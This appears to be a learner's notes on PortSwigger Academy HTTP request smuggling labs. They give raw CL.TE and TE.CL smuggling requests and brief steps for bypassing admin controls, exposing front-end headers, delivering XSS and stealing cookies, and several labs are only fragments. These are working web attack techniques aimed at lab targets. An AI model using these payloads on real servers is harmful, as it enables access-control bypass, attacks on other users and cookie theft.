labs
Lab - 1: HTTP request smuggling, basic CL.TE vulnerability (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.
send this request twice
POST / HTTP/1.1
Host: 0a540036047255c3c3ba1b66004300fe.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
Gfront end server will accept all and back end will execute only 0 and G is left for the first request and G is appended to the second request and will get an error
Lab - 2: HTTP request smuggling, basic TE.CL vulnerability (P)
This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.
POST / HTTP/1.1
Host: 0ae3007c043a9f14c0d3485f00be006d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Connection: keep-alive
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Two
Enterafter 0 is important.
Lab - 3: HTTP request smuggling, obfuscating the TE header (P)
This lab involves a front-end and back-end server, and the two servers handle duplicate HTTP request headers in different ways. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.
How to find
Lab - 4: HTTP request smuggling, confirming a CL.TE vulnerability via differential responses (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.
Lab - 5: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses (P)
This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.
How to exploit
Lab - 6: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. There's an admin panel at /admin, but the front-end server blocks access to it. To solve the lab, smuggle a request to the back-end server that accesses the admin panel and deletes the user carlos.
Try with
get 401 unauthorized
Duplicate header names are not allowed
get the admin panel
change the
GET /admin/delete?username=carlosto solve the lab
Lab - 7: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability (P)
This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. There's an admin panel at /admin, but the front-end server blocks access to it. To solve the lab, smuggle a request to the back-end server that accesses the admin panel and deletes the user carlos.
front end is TE and send all the requests to the backend
backend is CL and in the first request, until 87 is processed and the rest are remained for the next round
87 is hexadecimal which is 135 characters from GET /admin/... to x=4
Lab - 8: Exploiting HTTP request smuggling to reveal front-end request rewriting (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. There's an admin panel at /admin, but it's only accessible to people with the IP address 127.0.0.1. The front-end server adds an HTTP header to incoming requests containing their IP address. It's similar to the X-Forwarded-For header but has a different name. To solve the lab, smuggle a request to the back-end server that reveals the header that is added by the front-end server. Then smuggle a request to the back-end server that includes the added header, accesses the admin panel, and deletes the user carlos.
first test whether it is CL.TE or TE.CL and found that it is CL.TE
there is a search parameter in POST request and reflect back
to find which Header is responsible for IP address
and found that
after trying a little bit
Lab - 9: Exploiting HTTP request smuggling to deliver reflected XSS (P)
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. The application is also vulnerable to reflected XSS via the User-Agent header. To solve the lab, smuggle a request to the back-end server that causes the next user's request to receive a response containing an XSS exploit that executes alert(1).
first test whether it is CL.TE or TE.CL and found that it is CL.TE
reflected XSS at blog post
Lab - 10: H2.CL request smuggling (P)
This lab is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests even if they have an ambiguous length.
To solve the lab, perform a request smuggling attack that causes the victim's browser to load a malicious JavaScript file from the exploit server and call alert(document.cookie). The victim user accesses the home page every 10 seconds.
Last updated